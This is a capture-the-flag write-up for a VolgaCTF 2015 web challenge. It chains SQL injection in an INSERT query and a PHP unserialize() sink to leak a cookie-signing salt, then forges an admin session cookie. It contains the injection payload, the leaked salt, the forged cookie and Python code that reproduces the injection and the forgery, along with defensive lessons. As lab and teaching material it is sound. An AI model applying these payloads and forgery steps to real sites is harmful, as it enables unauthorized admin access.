The task gave us a website: http://web2.2015.volgactf.ru/

The site itself had nothing interesting, so we did some recon and found /robots.txt, which pointed us to another page, /SecretAdminPanel. That page only returned a forbidden message, but it also set a cookie named PHPSESS with the value {"isAdmin":false}0afb5cf5c7d66587da7c811767250458, i.e. a JSON blob followed by 32 hex characters that look like an MD5 hash. While fuzzing the parameters we suddenly got an SQLite error with /?qwe='

The error was odd at first, but we figured out we were injecting into an INSERT query. To dump the database we used error-based injection (https://rdot.org/forum/showthread.php?p=26419), but apart from a logs table nothing useful showed up. Then we found the /logs page.

This page lists all of our requests, and the params column of the logs table is passed through unserialize() before being displayed. Since the INSERT injection lets us write our own rows into that table, we control what gets unserialized. To get more information about the page we unserialized an Exception object: PHP captures a backtrace whenever an Exception is instantiated, which happens during unserialize() too, and the page dumps the resulting object:

web2.2015.volgactf.ru//SecretAdminPanel?qqq=";}'),('79.40.107.58','O:9:"Exception":0:{}');--
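To make the mechanics concrete, here is an added Python example; it is not code from the challenge (the real application was PHP), and the shape of the logging query is an assumption reconstructed from the payload above. It builds the INSERT the vulnerable way against an in-memory SQLite database, shows the lone quote from /?qwe=' raising an error, shows the payload adding a second row whose params column is O:9:"Exception":0:{}, and contrasts that with a parameterized INSERT that stores the payload verbatim. The IP address and the php_serialize helper are constructed for the demo.

```python
import sqlite3

# Constructed for this demo: the payload from the writeup as a Python string.
INJECT_PAYLOAD = '";}\'),(\'79.40.107.58\',\'O:9:"Exception":0:{}\');--'
ATTACKER_IP = "10.0.0.1"  # placeholder client address


def php_serialize(params):
    """Serialize a flat dict of strings the way PHP's serialize() formats
    an array of strings: a:N:{s:len:"key";s:len:"value";...}."""
    body = "".join(
        f's:{len(k.encode())}:"{k}";s:{len(v.encode())}:"{v}";'
        for k, v in params.items()
    )
    return f"a:{len(params)}:{{{body}}}"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logs (id INTEGER PRIMARY KEY, ip TEXT, params TEXT)")
    return conn


def log_request_vulnerable(conn, ip, params):
    """Assumed shape of the target's logging query: the serialized GET
    parameters are concatenated into the SQL, so a quote inside any
    parameter value terminates the string literal early."""
    sql = f"INSERT INTO logs (ip, params) VALUES ('{ip}', '{php_serialize(params)}')"
    conn.execute(sql)


def log_request_safe(conn, ip, params):
    """Same insert with bound parameters: the payload is stored verbatim."""
    conn.execute("INSERT INTO logs (ip, params) VALUES (?, ?)",
                 (ip, php_serialize(params)))


def rows(conn):
    """All (ip, params) rows in insertion order."""
    return list(conn.execute("SELECT ip, params FROM logs ORDER BY id"))


def probe_single_quote(conn):
    """The /?qwe=' probe: a lone quote makes SQLite reject the statement.
    Returns the error message, or None if the insert unexpectedly succeeded."""
    try:
        log_request_vulnerable(conn, ATTACKER_IP, {"qwe": "'"})
    except sqlite3.Error as e:
        return str(e)
    return None


def inject_serialized_row(conn):
    """The real payload: closes the string and the VALUES tuple, appends a
    second row with attacker-chosen params, and comments out the rest."""
    log_request_vulnerable(conn, ATTACKER_IP, {"qqq": INJECT_PAYLOAD})
    return rows(conn)


def safe_insert(conn):
    """Same payload through the parameterized insert: exactly one row."""
    log_request_safe(conn, ATTACKER_IP, {"qqq": INJECT_PAYLOAD})
    return rows(conn)


if __name__ == "__main__":
    print("probe error:", probe_single_quote(new_db()))
    print("vulnerable insert rows:")
    for r in inject_serialized_row(new_db()):
        print("  ", r)
    print("parameterized insert rows:")
    for r in safe_insert(new_db()):
        print("  ", r)
```

With the vulnerable query the second row's params column is exactly the serialized Exception, which is what /logs later hands to unserialize(); with bound parameters the whole payload ends up inside one serialized string and is harmless to the SQL (the unserialize() sink on /logs is a separate problem that binding parameters does not fix).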

And this led us to something interesting: the backtrace includes the arguments of every frame, among them the Session object passed to View->generate():

["file"]=>
string(57) "/var/www/web2/application/controllers/controller_logs.php"
["line"]=>
int(7)
["function"]=>
string(8) "generate"
["class"]=>
string(4) "View"
["type"]=>
string(2) "->"
["args"]=>
array(4) {
[0]=>
&string(13) "logs_view.php"
[1]=>
&string(17) "template_view.php"
[2]=>
object(Session)#3 (2) {
["cookieSalt":"Session":private]=>
string(20) "nO97M0Za6cu9wDC72VVv"
["params":"Session":private]=>
array(1) {
["isAdmin"]=>
bool(false)
}
}
[3]=>

So that salt is the key used to sign the cookie: PHPSESS is the JSON-encoded params followed by md5(params . salt), and the salt only leaked because the backtrace dumped the private properties of the Session object. With the salt known we can forge an admin cookie, {"isAdmin":true} followed by md5('{"isAdmin":true}nO97M0Za6cu9wDC72VVv'), which URL-encoded is %7B%22isAdmin%22%3Atrue%7D59218ddbff65da5eb025f5ee88260c9e
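The cookie forgery as an added Python example (not the challenge's own code). It assumes the scheme inferred above: PHPSESS = json_encode(params) followed by md5(json . salt), with the salt taken from the leaked Session object. make_cookie builds a value, parse_cookie checks it the way the server must, and forge_admin_cookie produces the URL-encoded value to submit.

```python
import hashlib
import hmac
import json
from urllib.parse import quote

# Salt recovered from the Exception backtrace on /logs.
SALT = "nO97M0Za6cu9wDC72VVv"
TAG_LEN = 32  # hex length of an MD5 digest


def encode_params(params):
    """json_encode()-style output: no whitespace, keys in insertion order."""
    return json.dumps(params, separators=(",", ":"))


def md5_tag(body, salt):
    """Assumed tag construction: md5(json || salt)."""
    return hashlib.md5((body + salt).encode()).hexdigest()


def make_cookie(params, salt=SALT):
    """Build a PHPSESS value: the JSON params followed by the tag."""
    body = encode_params(params)
    return body + md5_tag(body, salt)


def parse_cookie(cookie, salt=SALT):
    """Server-side check: split off the tag, recompute it, decode the JSON.
    Returns the params dict, or None if the tag does not match."""
    if len(cookie) <= TAG_LEN:
        return None
    body, tag = cookie[:-TAG_LEN], cookie[-TAG_LEN:]
    if not hmac.compare_digest(tag, md5_tag(body, salt)):
        return None
    try:
        return json.loads(body)
    except ValueError:
        return None


def forge_admin_cookie(salt=SALT):
    """The value to send as PHPSESS, URL-encoded like the original cookie."""
    return quote(make_cookie({"isAdmin": True}, salt), safe="")


if __name__ == "__main__":
    print("Cookie: PHPSESS=" + forge_admin_cookie())
    print("Server accepts it as:", parse_cookie(make_cookie({"isAdmin": True})))
```

The lesson is less about MD5 than about where the secret ended up: any tag of the form hash(data || secret) is forgeable by anyone who reads the secret, and here it sat in a private property of an object that a debug dump printed. Keep session secrets out of objects that get dumped, and never render exception backtraces with their arguments to users.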

then we went back to /SecretAdminPanel with that cookie and grabbed the flag: {417a4c17bd3132bba864dac9edf4ae7a}

Razor4x